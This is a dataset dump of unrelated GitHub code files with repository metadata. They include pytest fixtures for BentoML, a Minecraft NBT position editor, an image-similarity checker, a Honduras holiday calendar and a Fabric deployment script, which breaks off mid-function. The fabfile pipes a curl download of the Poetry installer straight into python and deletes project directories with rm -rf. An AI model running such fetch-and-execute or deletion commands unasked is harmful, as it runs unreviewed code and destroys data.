        # previous code skipped the restore on exceptional teardown.
        logger.propagate = False
@pytest.fixture(scope="function")
def reload_directory(
    request: pytest.FixtureRequest, tmp_path_factory: pytest.TempPathFactory
) -> t.Generator[pathlib.Path, None, None]:
    """
    This fixture will create an example bentoml working file directory
    and yield the results directory
    ./
    ├── models/ # mock default bentoml home models directory
    ├── [fdir, fdir_one, fdir_two]/
    │   ├── README.md
    ├── subdir/
    │   ├── README.md
    │   │   └── app.py
    │   ├── somerust.rs
    │   └── app.py
    ├── README.md
    ├── .bentoignore
    ├── bentofile.yaml
    ├── fname.ipynb
    ├── requirements.txt
    ├── service.py
    └── train.py
    """
    root = tmp_path_factory.mktemp("reload_directory")
    # create a models directory
    root.joinpath("models").mkdir()
    # enable this fixture to use with unittest.TestCase
    if request.cls is not None:
        request.cls.reload_directory = root
    root_file = [
        "README.md",
        "requirements.txt",
        "service.py",
        "train.py",
        "fname.ipynb",
    ]
    for f in root_file:
        p = root.joinpath(f)
        p.touch()
    # Write a bentofile.yaml describing a mock service that excludes *.rs.
    build_config = BentoBuildConfig(
        service="service.py:svc",
        description="A mock service",
        exclude=["*.rs"],
    ).with_defaults()
    bentofile = root / "bentofile.yaml"
    bentofile.touch()
    with bentofile.open("w", encoding="utf-8") as f:
        yaml.safe_dump(bentoml_cattr.unstructure(build_config), f)
    # Three identical sample "library" directories, each with a nested
    # subdir and a Rust file (the Rust file is excluded by the bentofile).
    custom_library = ["fdir", "fdir_one", "fdir_two"]
    for app in custom_library:
        ap = root.joinpath(app)
        ap.mkdir()
        dir_files: list[tuple[str, list[t.Any]]] = [
            ("README.md", []),
            ("subdir", ["README.md", "app.py"]),
            ("lib.rs", []),
            ("app.py", []),
        ]
        for name, maybe_files in dir_files:
            if maybe_files:
                dpath = ap.joinpath(name)
                dpath.mkdir()
                for f in maybe_files:
                    p = dpath.joinpath(f)
                    p.touch()
            else:
                p = ap.joinpath(name)
                p.touch()
    yield root
@pytest.fixture(scope="function", name="change_test_dir")
def fixture_change_test_dir(
    request: pytest.FixtureRequest,
) -> t.Generator[None, None, None]:
    """Run the test from the directory containing its test file, then
    chdir back to the original invocation directory afterwards."""
    os.chdir(request.fspath.dirname) # type: ignore (bad pytest stubs)
    yield
    os.chdir(request.config.invocation_dir) # type: ignore (bad pytest stubs)
@pytest.fixture(scope="session", name="dummy_model_store")
def fixture_dummy_model_store(tmpdir_factory: "pytest.TempPathFactory") -> ModelStore:
    """Session-scoped ModelStore pre-populated with dummy models.

    "testmodel" is created twice — presumably producing two versions of
    the same model tag (verify against bentoml.models.create semantics) —
    plus a single "anothermodel".
    """
    store = ModelStore(tmpdir_factory.mktemp("models"))
    with bentoml.models.create(
        "testmodel",
        module=__name__,
        signatures={},
        context=TEST_MODEL_CONTEXT,
        _model_store=store,
    ):
        pass
    # Intentional duplicate creation of "testmodel" (second entry).
    with bentoml.models.create(
        "testmodel",
        module=__name__,
        signatures={},
        context=TEST_MODEL_CONTEXT,
        _model_store=store,
    ):
        pass
    with bentoml.models.create(
        "anothermodel",
        module=__name__,
        signatures={},
        context=TEST_MODEL_CONTEXT,
        _model_store=store,
    ):
        pass
    return store
| almirb/BentoML | tests/conftest.py | conftest.py | py | 6,054 | python | en | code | null | github-code | 1 | [
{
"api_name": "typing.TYPE_CHECKING",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "bentoml._internal.models.ModelContext",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "_pytest.python.Metafunc",
"line_number": 26,
"usage_type": "name"
},
{
... |
71634532833 | import json
import argparse
import shutil
import nbt
import os
def main():
    """Rewrite a Minecraft player's dimension and position in their
    playerdata NBT file, backing up the original file first.

    Usage: ChangePlayerPos.py <username> <dim> <x> <y> <z>
    """
    parser = argparse.ArgumentParser(description='修改玩家座標')
    parser.add_argument("username", help="Player name", type=str)
    parser.add_argument("dim", help="Target dim", type=int)
    parser.add_argument("x", help="Target x", type=float)
    parser.add_argument("y", help="Target y", type=float)
    parser.add_argument("z", help="Target z", type=float)
    args = parser.parse_args()
    # usernamecache.json maps uuid -> username; invert the lookup.
    with open('usernamecache.json') as f:
        uuid_to_username = json.load(f)
    target_uuid = None
    for uuid, username in uuid_to_username.items():
        if username == args.username:
            target_uuid = uuid
    # BUG FIX: previously an unknown username crashed with a TypeError on
    # the string concatenation below; fail with a clear message instead.
    if target_uuid is None:
        raise SystemExit('Player not found: ' + args.username)
    print('Player uuid: ' + target_uuid)
    filename = os.path.join('world', 'playerdata', target_uuid + '.dat')
    # Keep a backup before modifying the player's data.
    shutil.copy(filename, filename + '.bak')
    player_dat = nbt.nbt.NBTFile(filename, 'rb')
    player_dat['Dimension'].value = args.dim
    player_dat['Pos'][0].value = args.x
    player_dat['Pos'][1].value = args.y
    player_dat['Pos'][2].value = args.z
    player_dat.write_file(filename)
    print('Done')
# Script entry point.
if __name__ == '__main__':
    main()
| danny50610/MCServerTool | ChangePlayerPos.py | ChangePlayerPos.py | py | 1,179 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_nu... |
15746108853 | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 24 11:26:01 2019
@author: soura
"""
import hashtag
import query
import username
import json
import decider
import pandas as pd
class Transfer:
    """Dispatches tweet collection by mode ("query"/"username"/"hashtag")
    and runs the decider model over the collected tweets."""
    def __init__(self):
        # Mode name -> JSON results file written by the matching collector.
        self.file_mapping = {"query":"query_results.json", "username":"username_results.json","hashtag":"hashtag_results.json"}
        self.predictor=decider.Decider(mode="test")
    def set_mode(self, mode):
        # Must be called before fetch_predict; no default mode is set.
        self.mode = mode
    def fetch_predict(self, data):
        """Collect tweets for *data* per the current mode, then return a
        DataFrame of the tweets with their model predictions."""
        filename = self.file_mapping[self.mode]
        if self.mode=="query":
            query.fetch_queries(data)
        elif self.mode=="username":
            username.get_tweets(data)
        else:
            hashtag.get_tweets(data)
        # NOTE(review): the file handle from open() is never closed.
        data=json.load(open(filename,'r'))
        tweets=[]
        for obj in data:
            tweets.append(obj['tweet'])
        predictions=[self.predictor.predict(tweets[i])[0] for i in range(len(tweets))]
return pd.DataFrame({"Tweets":tweets,"Prediction":predictions}) | SaurabhRuikar/TwitterMining | control_transfer.py | control_transfer.py | py | 1,045 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "decider.Decider",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "query.fetch_queries",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "username.get_tweets",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "hashtag.get_t... |
72663761634 | import pandas as pd
import rpy2.robjects.packages as rpackages
from rpy2.robjects.vectors import StrVector
import xlsxwriter
def add_feature_metadata(df_target, df_feature_metadata, df_target_fn_col=None):
    """Adds feature metadata columns to df_target.

    Args:
        df_target - a DataFrame; must contain feature names somewhere
        df_feature_metadata - a DataFrame containing feature metadata,
            as loaded by fst.py's self.feature_metadata
        df_target_fn_col - the name of the column in df_target that contains
            the feature names, or None if it's the index of df_target that
            contains the feature names
    Returns:
        a copy of df_target with the feature metadata added; features named
        'shadow_*' get group 'Shadow', and features with no metadata get
        group 'NA'
    """
    original_index = df_target.index
    if df_target_fn_col is not None:
        # Temporarily re-key df_target by feature name so join() lines up.
        df_target.index = df_target[df_target_fn_col]
    df_joined = df_target.join(df_feature_metadata)
    # add groups for shadow features
    s_group = df_joined['group']
    feature_names = s_group.index.values
    s_non_shadows = pd.Series(
        [not fname.startswith('shadow_') for fname in feature_names],
        index=feature_names)
    s_group = s_group.where(s_non_shadows, 'Shadow')
    df_joined['group'] = s_group
    # handle any remaining NaN groups
    # BUG FIX: fillna() returns a new Series; the previous code discarded
    # the result, so NaN groups were never replaced.  Assign it back.
    df_joined['group'] = df_joined['group'].fillna('NA')
    # restore index
    df_target.index = original_index
    return df_joined
def create_refuse_xlsx(df_refuse_table, df_feature_metadata, outpath):
    """Creates an Excel spreadsheet containing the REFUSE Table data,
    annotated with the feature metadata, saved to the given outpath.

    Rows are sorted by VIM_mean (descending); p_val cells above 0.5 are
    highlighted with the "relevant" style.
    """
    # merge data
    df_complete = add_feature_metadata(df_refuse_table, df_feature_metadata)
    df_complete['Feature Name'] = df_complete.index.values # easier to iterate
    # sort by VIM_mean
    # BUG FIX: DataFrame.sort() was removed from pandas (0.20+);
    # sort_values() is the supported equivalent.
    df_complete.sort_values(by='VIM_mean', ascending=False, inplace=True)
    # create spreadsheet
    workbook = xlsxwriter.Workbook(outpath)
    worksheet = workbook.add_worksheet()
    # start from first cell (zero-indexed)
    row = 0
    col = 0
    # styles
    title_style = workbook.add_format({
        'font_size': 12,
        'font_color': 'white',
        'bg_color': '#808080'
    })
    relevant_style = workbook.add_format({
        'font_size': 12,
        'bg_color': '#EBF1DE'
    })
    default_style = workbook.add_format({
        'font_size': 12})
    # these columns should always come first
    column_order = ['Feature Name', 'VIM_mean', 'p_val', 'VIM_var', 'group']
    # there may be user-defined columns to follow
    additional_columns = [x for x in df_complete.columns.values
                          if x not in column_order]
    # final order
    column_order += additional_columns
    # some columns get user-friendly names
    column_titles = {
        'VIM_mean': 'Rank (higher=better)',
        'p_val': 'Likelihood of Relevance',
        'VIM_var': 'Variance of Rank',
        'group': 'Group Name'}
    # Write one spreadsheet column per DataFrame column: header row first,
    # then the data cells beneath it.
    for column in column_order:
        row = 0
        title = column
        if column in column_titles:
            title = column_titles[column]
        worksheet.write(row, col, title, title_style)
        for cell in df_complete[column]:
            row += 1
            style = default_style
            if column == 'p_val' and cell > 0.5:
                style = relevant_style
            worksheet.write(row, col, cell, style)
        col += 1
    # set column widths
    worksheet.set_column(0, len(column_order)-1, 30)
    workbook.close()
def check_r_packages():
    """Ensures required R packages are installed.

    Installs any missing package from CRAN, then re-verifies every
    package, because R's install_packages can fail without raising.
    Raises Exception listing any packages that still failed to install.
    """
    # import R's utility package
    utils = rpackages.importr('utils')
    # R package names
    packnames = ('classInt',
                 'minerva', # should already be installed in dockerfile
                 'randomForest', #should already be installed in dockerfile
                 #'ggplot2', #used by FST commands that generate PDFs, which aren't currently
                 # #used, and this package doesn't install properly due to versioning problems
                 'MASS',
                 'gplots')
    # R vector of strings
    for x in packnames:
        print('$$$ ensuring installation of R package: ' + str(x))
        if rpackages.isinstalled(x):
            print('$$$ already installed')
        else:
            print('$$$ INSTALLING: ' + x)
            utils.install_packages(StrVector([x]), verbose=True, quiet=False, dependencies=True, repos="https://cran.rstudio.com", method="curl")
            print('$$$ reported as now installed? ' + str(rpackages.isinstalled(x)) + ' for ' + x)
    #R likes to fail silently, so double check.
    failed_installs = [x for x in packnames if not rpackages.isinstalled(x)]
    if failed_installs:
        raise Exception('rpackages claims to have installed these packages, but did not: ' + str(failed_installs))
| KnowEnG/platform | nest_py/lib_src/fst_pipeline/fst_utils.py | fst_utils.py | py | 4,881 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "pandas.Series",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "xlsxwriter.Workbook",
"line_number": 51,
"usage_type": "call"
},
{
"api_name": "rpy2.robjects.packages.importr",
"line_number": 108,
"usage_type": "call"
},
{
"api_name": "rpy... |
26292649193 | """Management of per-player info."""
from functools import partial
from PyQt5.QtCore import Qt
from PyQt5.QtGui import QIntValidator, QPalette, QColor
from PyQt5.QtWidgets import (
QFormLayout,
QGroupBox,
QGridLayout,
QHBoxLayout,
QLabel,
QLineEdit,
QPushButton,
QWidget,
)
from table.scorer import Phase, dress_value
class Player(QGroupBox):
    """A widget for managing player info."""
    def __init__(self, name, dress_cb, drop_cb):
        """Initialise with name and a callback for board dressing.

        Args:
            name: player name, also used as the group-box title.
            dress_cb: called with this widget when "Dress" is clicked.
            drop_cb: called with this widget when "Go Out" is clicked.
        """
        super().__init__(name)
        self.name = name
        self.setAlignment(Qt.AlignCenter)
        layout = QFormLayout()
        # Read-only counter-balance display.
        self.count = QLabel("")
        layout.addRow("Count:", self.count)
        # Integer-only entry for the player's remaining cards.
        self.cards = QLineEdit()
        self.cards.setValidator(QIntValidator())
        layout.addRow("Cards:", self.cards)
        self.dress = QPushButton("Dress")
        self.dress.clicked.connect(partial(dress_cb, self))
        self.drop = QPushButton("Go Out")
        self.drop.clicked.connect(partial(drop_cb, self))
        # Hidden until the player runs out of counters (see refresh()).
        self.drop.hide()
        buttons = QHBoxLayout()
        buttons.addWidget(self.dress)
        buttons.addWidget(self.drop)
        layout.setLayout(2, QFormLayout.SpanningRole, buttons)
        self.setLayout(layout)
    def set_color(self, color):
        """Set the color palette of both buttons."""
        for button in (self.dress, self.drop):
            col = QColor(color)
            if not button.isEnabled():
                # Fade the colour of disabled buttons via translucency.
                col.setAlpha(150)
            pal = button.palette()
            pal.setColor(self.backgroundRole(), col)
            pal.setColor(QPalette.ButtonText, col.darker())
            button.setPalette(pal)
    def set_bold_italic(self, bold_italic):
        """Set whether the font should be both bold and italic or not."""
        font = self.font()
        font.setBold(bold_italic)
        font.setItalic(bold_italic)
        self.setFont(font)
    def refresh(self, phase, is_in_game, is_dresser, balance):
        """Refresh the widget based on the game state.

        Args:
            phase: the current Phase of the round.
            is_in_game: whether this player is still in the game.
            is_dresser: whether this player must dress the board.
            balance: this player's current counter balance.
        """
        # Update player scores
        self.count.setText(str(balance))
        # Clear card counts
        self.cards.setText("")
        # Deduce other flags
        must_dress = is_dresser and (phase == Phase.DRESSING)
        cannot_dress = balance < dress_value()
        out_of_counters = (must_dress and cannot_dress) or (balance < 0)
        # Update widget availability based on the game state
        self.setEnabled(is_in_game)
        self.cards.setEnabled(phase == Phase.SCORING)
        self.dress.setEnabled(must_dress)
        self.drop.setEnabled(out_of_counters)
        if out_of_counters:
            self.drop.show()
        else:
            self.drop.hide()
        # Update colour based on game state
        if not is_in_game:
            self.set_color(Qt.lightGray)
        elif out_of_counters:
            self.set_color(Qt.red)
        elif cannot_dress:
            self.set_color(Qt.yellow)
        elif must_dress:
            self.set_color(Qt.green)
        else:
            self.set_color(Qt.darkGray)
        # Update font based on whether the player is the dresser
        self.set_bold_italic(is_dresser)
    @property
    def cards_left(self):
        """Get the number of cards remaining (0 if the field is empty)."""
        try:
            return int(self.cards.text())
        except ValueError:
            return 0
class PlayerPanel(QWidget):
    """A panel of widgets for managing player info."""
    # Number of player widgets stacked per column before a new column starts.
    N_ROWS = 4
    def __init__(self, players, dress_cb, drop_cb):
        """Initialise from a list of names and board dressing callback."""
        super().__init__()
        layout = QGridLayout()
        self.players = {}
        for i, name in enumerate(players):
            player = Player(name, dress_cb, drop_cb)
            self.players[name] = player
            # Widgets occupy even grid rows; the odd row below each one is
            # a stretchable spacer.
            row = 2 * (i % self.N_ROWS)
            col = (i // self.N_ROWS)
            layout.addWidget(player, row, col)
            layout.setRowStretch(row + 1, 1)
        self.setLayout(layout)
    def __getitem__(self, key):
        """Return the requested player widget."""
        return self.players[key]
    def __iter__(self):
        """Return iterator through player widgets."""
        return iter(self.players.values())
    def refresh(self, phase, players, dresser, balance):
        """Refresh the player score displays based on the game state.

        Args:
            phase: the current Phase of the round.
            players: collection of names still in the game.
            dresser: name of the player who dresses the board.
            balance: mapping of player name to counter balance.
        """
        for name, player in self.players.items():
            player.refresh(phase,
                           name in players,
                           name == dresser,
                           balance[name])
| martinblake/pope-joan | table/player.py | player.py | py | 4,657 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PyQt5.QtWidgets.QGroupBox",
"line_number": 20,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtCore.Qt.AlignCenter",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "PyQt5.QtCore.Qt",
"line_number": 27,
"usage_type": "name"
},
{
"api_na... |
13025816665 | import glob
import cv2
import pandas as pd
import openpyxl
from openpyxl.utils.dataframe import dataframe_to_rows
from skimage.metrics import structural_similarity as ssim
import os
import sys
def SearchExtFiles(fpath, ext, lst):
    """Recursively collect paths under *fpath* whose extension equals *ext*.

    Args:
        fpath: directory to search.
        ext: file extension including the dot, e.g. '.bmp'.
        lst: output list; matching paths are appended in place.
    """
    try:
        entries = os.listdir(fpath)
    except OSError:
        # Unreadable / nonexistent directory: skip silently, as before —
        # but no longer swallow unrelated exceptions with a bare except.
        return
    for entry in entries:
        # Renamed from `next`, which shadowed the builtin.
        entry_path = os.path.join(fpath, entry)
        if os.path.splitext(entry_path)[-1] == ext:
            lst.append(entry_path)
        if os.path.isdir(entry_path):
            SearchExtFiles(entry_path, ext, lst)
# Auto-fit column widths.
def AutoFitColumnSize(worksheet, columns=None, margin=2):
    """Resize worksheet columns to fit their longest cell value.

    Args:
        worksheet: an openpyxl worksheet.
        columns: list of 0-based column indices to resize, or None for all.
        margin: extra width added beyond the longest value.
    """
    for i, column_cells in enumerate(worksheet.columns):
        # Resize when no filter was given, or this column is selected.
        # (Idiom fix: `is None` instead of `== None`.)
        is_ok = columns is None or (isinstance(columns, list) and i in columns)
        if is_ok:
            length = max(len(str(cell.value)) for cell in column_cells)
            worksheet.column_dimensions[column_cells[0].column_letter].width = length + margin
def image_compare():
    """Compare .bmp images from two directory trees (sys.argv[1] vs
    sys.argv[2]) with SSIM and record differing images in test.xlsx."""
    # Create the workbook object.
    wb = openpyxl.Workbook()
    # Select the active sheet.
    ws = wb.active
    ws.append(['index', 'Similarity', 'different image'])
    refLst = []
    SearchExtFiles(sys.argv[1],'.bmp',refLst) # if images sit next to main, the path can be './' (paths are supplied as parameters via edit_Configuration)
    compLst = []
    SearchExtFiles(sys.argv[2],'.bmp', compLst)
    # Read every file.  (Comment originally said glob; SearchExtFiles is used.)
    ref_img_list = refLst
    compare_img_list = compLst
    for i in range(len(ref_img_list)):
        imageA = cv2.imread(ref_img_list[i])
        imageB = cv2.imread(compare_img_list[i])
        imageC = imageA.copy()
        # NOTE(review): this compares full paths from two different roots,
        # so it is only true when both roots are the same — confirm whether
        # basenames were intended.
        if (ref_img_list[i] == compare_img_list[i]):
            tempDiff = cv2.subtract(imageA, imageB)
            grayA = cv2.cvtColor(imageA, cv2.COLOR_BGR2GRAY)
            grayB = cv2.cvtColor(imageB, cv2.COLOR_BGR2GRAY)
            (score, diff) = ssim(grayA, grayB, full=True)
            diff = (diff * 255).astype("uint8")
            print(f"Similarity: {score:.5f}")
            if (score == 1):
                print("같음")
            # When the images differ, record the file name in the spreadsheet.
            else:
                diff_image = ref_img_list[i]
                print(diff_image)
                df = pd.DataFrame([[score, diff_image]], index=[ws.max_row/2+0.5], columns=['Similarity', 'different image'])
                # df = pd.DataFrame([[score, diff_image]])
                # Insert the DataFrame into the sheet.
                for r in dataframe_to_rows(df, index=True, header=False): # True: include the index column, False: exclude it
                    ws.append(r)
                print("다름")
            # assert is a debugging aid the developer places where a failure
            # would be fatal; fires if no similarity score was produced.
            assert score, "다른 점 찾을 수 없음"
    # NOTE(review): reset_index(inplace=True) returns None, so df becomes
    # None here; df is also unbound if no differing image was found.
    df = df.reset_index(inplace=True)
    AutoFitColumnSize(ws)
    # df.index=df.index+1
    # Save the workbook to an Excel file.
    wb.save("./test.xlsx")
    # Press any key to exit.
    cv2.waitKey(0)
# Press the green button in the gutter to run the script.
# Script entry point.
if __name__ == '__main__':
    image_compare()
| siszero/TIL | Python/main.py | main.py | py | 3,313 | python | ko | code | 0 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.path.splitext",
"line_num... |
14109182065 | # -*- coding: utf-8 -*-
# python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Author: ryanss <ryanssdev@icloud.com> (c) 2014-2017
# dr-prodigy <maurizio.montel@gmail.com> (c) 2017-2020
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from datetime import date
from dateutil.easter import easter
from dateutil.relativedelta import relativedelta as rd, TH, FR, SA, SU
from holidays.constants import JAN, FEB, MAR, APR, MAY, SEP, OCT, \
DEC
from holidays.holiday_base import HolidayBase
class Honduras(HolidayBase):
    """Holiday provider for Honduras.

    Reference: https://www.timeanddate.com/holidays/honduras/
    """
    def __init__(self, **kwargs):
        # ISO 3166-1 alpha-3 code for Honduras.
        self.country = "HND"
        HolidayBase.__init__(self, **kwargs)
    def _populate(self, year):
        """Populate self with the Honduran holidays for *year*.

        NOTE(review): in the `self.observed and date(...)` guards below,
        the date(...) call is always truthy, so each condition reduces to
        plain `self.observed`; with observed=False most fixed-date
        holidays are skipped entirely.  Confirm against upstream intent.
        """
        # New Year's Day
        if self.observed and date(year, JAN, 1):
            self[date(year, JAN, 1)] = "Año Nuevo [New Year's Day]"
        # The Three Wise Men Day
        if self.observed and date(year, JAN, 6):
            name = "Día de los Reyes Magos [The Three Wise Men Day] (Observed)"
            self[date(year, JAN, 6)] = name
        # Our Lady of Suyapa
        if self.observed and date(year, FEB, 3):
            name = "Día de la virgen de Suyapa [Our Lady of Suyapa] (Observed)"
            self[date(year, FEB, 3)] = name
        # The Father's Day
        if self.observed and date(year, MAR, 19):
            name = "Día del Padre [Father's Day] (Observed)"
            self[date(year, MAR, 19)] = name
        # Maundy Thursday
        self[easter(year) + rd(weekday=TH(-1))
             ] = "Jueves Santo [Maundy Thursday]"
        # Good Friday
        self[easter(year) + rd(weekday=FR(-1))
             ] = "Viernes Santo [Good Friday]"
        # Holy Saturday
        self[easter(year) + rd(weekday=SA(-1))
             ] = "Sábado de Gloria [Holy Saturday]"
        # Easter Sunday
        self[easter(year) + rd(weekday=SU(-1))
             ] = "Domingo de Resurrección [Easter Sunday]"
        # America Day
        if self.observed and date(year, APR, 14):
            self[date(year, APR, 14)] = "Día de las Américas [America Day]"
        # Labor Day
        if self.observed and date(year, MAY, 1):
            self[date(year, MAY, 1)] = "Día del Trabajo [Labour Day]"
        # Mother's Day: 14 - weekday(May 1) yields the second Sunday of May.
        may_first = date(int(year), 5, 1)
        weekday_seq = may_first.weekday()
        mom_day = (14 - weekday_seq)
        if self.observed and date(year, MAY, mom_day):
            str_day = "Día de la madre [Mother's Day] (Observed)"
            self[date(year, MAY, mom_day)] = str_day
        # Children's Day
        if self.observed and date(year, SEP, 10):
            name = "Día del niño [Children day] (Observed)"
            self[date(year, SEP, 10)] = name
        # Independence Day
        if self.observed and date(year, SEP, 15):
            name = "Día de la Independencia [Independence Day]"
            self[date(year, SEP, 15)] = name
        # Teacher's Day
        if self.observed and date(year, SEP, 17):
            name = "Día del Maestro [Teacher's day] (Observed)"
            self[date(year, SEP, 17)] = name
        # October Holidays are joined on 3 days starting at October 3 to 6.
        # Some companies work medium day and take the rest on saturday.
        # This holiday is variant and some companies work normally.
        # If start day is weekend is ignored.
        # The main objective of this is to increase the tourism.
        # https://www.hondurastips.hn/2017/09/20/de-donde-nace-el-feriado-morazanico/
        if year <= 2014:
            # Morazan's Day
            if self.observed and date(year, OCT, 3):
                self[date(year, OCT, 3)] = "Día de Morazán [Morazan's Day]"
            # Columbus Day
            if self.observed and date(year, OCT, 12):
                self[date(year, OCT, 12)] = "Día de la Raza [Columbus Day]"
            # Army Day
            if self.observed and date(year, OCT, 21):
                str_day = "Día de las Fuerzas Armadas [Army Day]"
                self[date(year, OCT, 21)] = str_day
        else:
            # Morazan Weekend
            if self.observed and date(year, OCT, 3):
                name = "Semana Morazánica [Morazan Weekend]"
                self[date(year, OCT, 3)] = name
            # Morazan Weekend
            if self.observed and date(year, OCT, 4):
                name = "Semana Morazánica [Morazan Weekend]"
                self[date(year, OCT, 4)] = name
            # Morazan Weekend
            if self.observed and date(year, OCT, 5):
                name = "Semana Morazánica [Morazan Weekend]"
                self[date(year, OCT, 5)] = name
        # Christmas
        self[date(year, DEC, 25)] = "Navidad [Christmas]"
class HN(Honduras):
    # ISO 3166-1 alpha-2 country-code alias.
    pass
class HND(Honduras):
    # ISO 3166-1 alpha-3 country-code alias.
    pass
| jose-dom/bitcoin_forecasting | env/lib/python3.9/site-packages/holidays/countries/honduras.py | honduras.py | py | 5,085 | python | en | code | 10 | github-code | 1 | [
{
"api_name": "holidays.holiday_base.HolidayBase",
"line_number": 24,
"usage_type": "name"
},
{
"api_name": "holidays.holiday_base.HolidayBase.__init__",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "holidays.holiday_base.HolidayBase",
"line_number": 29,
"usag... |
# EDITOR > File and Code Templates put this here!
import matplotlib
import matplotlib.pyplot as plt
import numpy as np

# Sample data: a parabola over [-10, 10].
x = np.linspace(-10, 10, 100)
y = x ** 2
#%%
plt.close('all')
plt.ion()
# style sheet reference: https://matplotlib.org/3.1.0/gallery/style_sheets/style_sheets_reference.html
# NOTE: on matplotlib >= 3.6 this style is named 'seaborn-v0_8'.
plt.style.use('seaborn')
fig, ax = plt.subplots(1, 1)  # , figsize=(12,9), sharex=False) # W x H
# fig = matplotlib.pyplot.figure
plt.plot(x, y, color='orange', linestyle='-')
# Do this, then get autocomplete pop-ups on plt.
# FIX: assert against the public matplotlib.axes.Axes class; the private
# matplotlib.axes._subplots.Subplot was removed in matplotlib 3.7, and
# subplot axes are Axes instances, so this check remains valid.
assert isinstance(ax, matplotlib.axes.Axes)
# ax.
#%%
| OSHI7/Learning1 | TestAutoComplete.py | TestAutoComplete.py | py | 581 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.linspace",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.close",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "matplotlib.py... |
13225320697 | from __future__ import annotations
import configparser
import datetime
import os
import typing
import fabric
import invocations.console
import invoke
import invoke_patch
import src.constants
class GlobalConfig:
    """Deployment settings shared by all tasks, loaded from fabfile.cfg."""
    host: str
    user: str
    key_filename: str
    project_name: str
    project_path: str
    # Project source files uploaded to the server by the upload task.
    source_filenames = [
        'main.py',
        'database.py',
        'utils.py',
        'telegram_utils.py',
        'analytics.py',
        'constants.py',
        'custom_logger.py',
        'config.cfg'
    ]
    # Packaging metadata files uploaded from the repository root.
    meta_filenames = [
        'pyproject.toml',
        'poetry.lock'
    ]
    # Source directories whose files are uploaded recursively.
    source_directories = [
        'migrations'
    ]
    @classmethod
    def load(cls) -> None:
        """Read fabfile.cfg into the class attributes.

        Exits the invoke program with code 1 on any configparser error.
        """
        try:
            fabfile_config = configparser.ConfigParser()
            fabfile_config.read('fabfile.cfg')
            cls.host = fabfile_config.get('Fabric', 'Host')
            cls.user = fabfile_config.get('Fabric', 'User')
            cls.key_filename = os.path.expanduser(fabfile_config.get('Fabric', 'KeyFilename'))
            cls.project_name = fabfile_config.get('Fabric', 'ProjectName')
            cls.project_path = fabfile_config.get('Fabric', 'ProjectPath')
        except configparser.Error as error:
            raise invoke.Exit(
                message=f'Config error: {error}',
                code=1
            )
invoke_patch.fix_annotations()
GlobalConfig.load()
@fabric.task
def configure(connection: fabric.Connection) -> None:
    """Prepare *connection* with the configured user and SSH key."""
    connection.user = GlobalConfig.user
    connection.inline_ssh_env = True
    connection.connect_kwargs.key_filename = GlobalConfig.key_filename
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'command': 'The shell command to execute on the server', 'env': 'An optional dictionary with environment variables'})
def execute(connection: fabric.Connection, command: str, env: typing.Optional[typing.Dict[str, str]] = None) -> None:
    """Run *command* on the remote server; no-op when command is empty."""
    if not command:
        return
    connection.run(command, env=env)
@fabric.task(pre=[configure], hosts=[GlobalConfig.host])
def cleanup(connection: fabric.Connection) -> None:
    """Delete the project from the server after interactive confirmation."""
    question = f'Are you sure you want to completely delete the project "{GlobalConfig.project_name}" from "{GlobalConfig.host}"?'
    if invocations.console.confirm(
        question=question,
        assume_yes=False
    ):
        # Remove both the home-directory symlink and the real project dir.
        execute(connection, f'rm -rf {GlobalConfig.project_name}')
        execute(connection, f'rm -rf {GlobalConfig.project_path}/{GlobalConfig.project_name}')
@fabric.task(pre=[configure, cleanup], hosts=[GlobalConfig.host])
def setup(connection: fabric.Connection) -> None:
    """Create the remote project directory, link it into $HOME, install poetry."""
    execute(connection, f'mkdir -p {GlobalConfig.project_path}/{GlobalConfig.project_name}')
    execute(connection, f'ln -s {GlobalConfig.project_path}/{GlobalConfig.project_name} {GlobalConfig.project_name}')
    # Official poetry installer; runs under the server's default python.
    execute(connection, 'curl -sSL https://install.python-poetry.org | python -')
@fabric.task(pre=[configure], hosts=[GlobalConfig.host], help={'filename': 'An optional filename to deploy to the server'})
def upload(connection: fabric.Connection, filename: typing.Optional[str] = None) -> None:
    """Upload project files to the server.

    With no ``filename`` every registered source file, metadata file and
    source directory is uploaded; otherwise only the given file/directory,
    which must be registered on :class:`GlobalConfig`.

    Raises:
        invoke.ParseError: if ``filename`` is not a registered file/directory.
    """
    def upload_file(file_format: str, file_name: str, destination_path_format='{.project_name}/{}') -> None:
        # file_format locates the local file; destination_path_format is
        # formatted with (GlobalConfig, file_name) to build the remote path.
        connection.put(file_format.format(file_name), destination_path_format.format(GlobalConfig, file_name))
    def upload_directory(directory_name: str) -> None:
        # Mirror the local src/<dir> tree into the remote project directory.
        execute(connection, f'mkdir -p {GlobalConfig.project_name}/{directory_name}')
        for _root, _directories, files in os.walk(f'src/{directory_name}'):
            for file in files:
                upload_file(f'src/{directory_name}/{{}}', file, f'{{.project_name}}/{directory_name}/{{}}')
    if filename:
